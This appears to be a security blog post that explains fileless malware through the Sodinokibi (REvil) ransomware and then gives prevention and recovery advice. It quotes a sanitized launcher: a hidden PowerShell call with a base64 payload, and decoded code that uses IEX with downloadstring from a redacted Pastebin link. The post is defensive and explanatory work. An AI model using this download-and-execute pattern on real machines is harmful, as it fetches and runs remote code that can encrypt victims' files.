I previously wrote about another technique malware and ransomware authors were using to obfuscate their infections. Fileless malware is the natural evolution of this and is far scarier for file-based antivirus solutions. These infections have been making the news with Sodinokibi (or Revil), and others.
These malware attacks are coming from more recent exploits which allow them to run what they want in memory without having to touch the disk at all (for the infection itself) as long as Powershell works on the machine. These attacks hit suddenly and efficiently, and are missed by most current traditional antivirus solutions. The combination of zero-day exploits and majorly obfuscated launch methods make preventing these require vigilance in every aspect of security from patching to user education.
What Is Fileless Malware?
Fileless malware is malware which does not exist in a file on the disk itself. This is not to say a file cannot be involved (as typically you see a batch file or other script kick off the process), but that the actual payload piece is not found in a file. These work by having a downloader which is completely impossible to identify as anything more than just a simple downloader. This downloader drops a bit of Powershell which then bootstraps the infection from a download somewhere into a collection of exploits which then loads itself into memory to deliver its final payload.
These types of infections typically lack persistence for the primary infection, but that isn’t to say they couldn’t drop a payload to take over a machine after the primary infection has run its course (some newer version of Crysis drop a trojan or two from what I’ve seen). These infections avoid most file-based antivirus solutions by skipping file persistence and using novel techniques to kick off the process. They also try to infect or encrypt files by using functions which are almost indistinguishable from intentional encryption a user might do.
How Does It Get Through?
Even though it’s a decades old exploit, things like Heaven’s Gate are still in use even today. There are plenty of new exploits, including caches of zero-days, leveraged as well. Heavy obfuscation and nasty exploits allow for these types of infections to slip past most antivirus solutions.
Most antivirus solutions work off of either process detection or file detection. File detection is more common, but obviously doesn’t do much when it comes to fileless malware. Process detection on the other hand can be used, but the combination of zero-days and other exploits to slip by detection can leave the antivirus in the dust until the infection is more understood. Even file detection can help with the delivery mechanisms, but the infection has a period where it can hit unobstructed.
Sodinokibi
Sodinokibi, or REvil, is one of the most well known fileless malware variants around today. Sodinokibi works by dropping either a batch file (typically called 1488.bat), or by running a one-liner, which is a Powershell command with a base64 encoded string. All this Powershell piece does is download a file from somewhere like Pastebin or Github, then it loads it and runs a function which stages the attack in memory.
The initial pieces look something like (please note: this code has been cleaned up so that it cannot and will not actually execute anything):
1488.bat
cmd.exe /c START %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -e [base64 payload]
Base64 decoded
If($ENV:PROCESSOR_ARCHITECTURE -contains 'AMD64'){ Start-Process -FilePath "$Env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -argument "IEX ((new-object net.webclient).downloadstring('[link on Pastebin]'));Invoke-[random letters];Start-Sleep -s 1000000;"}else{ IEX ((new-object net.webclient).downloadstring('[link on Pastebin]'));Invoke-[random letters];Start-Sleep -s 1000000; }
The Invoke-[random letters] function is in the downloaded payload which serves to stage loading a binary into memory and setting the stage to jump into this process. This link is pretty big and came out near 3000 lines in the variant I worked with. It is obviously quite nasty even though it doesn’t really have any telltale signs in the payload that it’s about to do something so sinister. This pipeline lets it cut through many antivirus solutions if the initial piece is able to run.
This infection then goes through and encrypts files. It targets basically every common file format which can hold data from pictures to zipped files. It very rarely leaves the machine in a non-functioning state unlike some other infections.
What Lead to Fileless Malware?
Fileless malware is the natural evolution of what I previously termed object-oriented malware. Object-oriented malware gets past antivirus solutions in a similar fashion, but still uses intermediate files which can be detected or blocked. There are multiple weaknesses in this process which can cause an infection to be wiped out or at least detected. The persistence can be annoying, but once an antivirus solution picks up on it, it can break enough of the process to leave the infection as nothing more than a nuisance.
Fileless malware is simple and efficient, but takes many of the techniques which object-oriented malware uses, but pushes them to the next level for obfuscating its operation and hiding itself on the system. The philosophy behind object-oriented malware is complexity leading to resilience and obfuscation, while fileless malware is designed with simplicity in mind. Fileless malware typically has a singular goal, and the persistence it has is in the damage it does rather than in trying to keep the machine infected.
What Can Be Done to Stop Fileless Malware?
Virtually all fileless malware variants rely on Powershell to run. Disabling Powershell is a quick way to prevent this, but isn’t typically the best solution for most production environments without heavy tweaking and consideration of site management and site requirements. Some antivirus solutions provider a saner way to reduce Powershell from running without completely crippling the machine, but it ultimately depends on what solution is employed or can be employed.
A lot of these infections are packed in with phishing emails or deployed via RMM exploits. Locking down spam combined with user education can help prevent many of these issues (and more). RMM exploits are a bit harder to nail down, but 2FA and locking down accounts give the most bang for the bucks. Keeping on top of zero-day exploits by patching machines and keeping on top of CVE’s is essential as well.
A combination of antivirus solutions which mix philosophies of process and file scanning can be used in order to try and prevent these types of attacks from getting through. Process scanning can be impactful on performance in some cases, and depending on the solution may or may not catch these attacks if the attack vector is too new. File scanning won’t really do much for these unless there’s a dropper, but they are very useful for other classes of infections and can prevent infections from getting a chance to even run.
Rolling Back the Clock
No solution is going to fully prevent any and every infection, but the goal is to reduce the attack surface to the point a successful exploit is the exception rather than the rule. Should you get hit by this type of infection, there really isn’t much which can be done aside from clearing out the infection and restoring from backup. The infection can usually be tracked down by watching for weird processes (processes masquerading as svchost.exe, fake Windows processes, names which are just a combination of characters which don’t look human readable, etc.) and killing them (though you shouldn’t just kill processes at random if you don’t know what you’re doing with this). If there is a ransom note or some other sign of a specific infection, one can use it to track down more specific remediation steps for the infection.
Most of these types of infections will be ransomware since they are not made to be persistent (aside from the damage). Having good backups and being prepared to restore from them at any time is essential. If prevention doesn’t work, restoration is the only choice. To roll back the clock, you have to have a solid plan and a way to implement it as well.
Conclusion
Fileless malware is the next generation of malware and is something to be aware of. Traditional antivirus software tends to miss these types of attacks when they first launch. Preventing scripting and locking down zero-day exploits where possible is the best way to deal with these and to prevent these, but isn’t always an option in every scenario. Minimize the attack surface as much as possible and make sure to have good backups wherever possible.
Image by Elchinator from Pixabay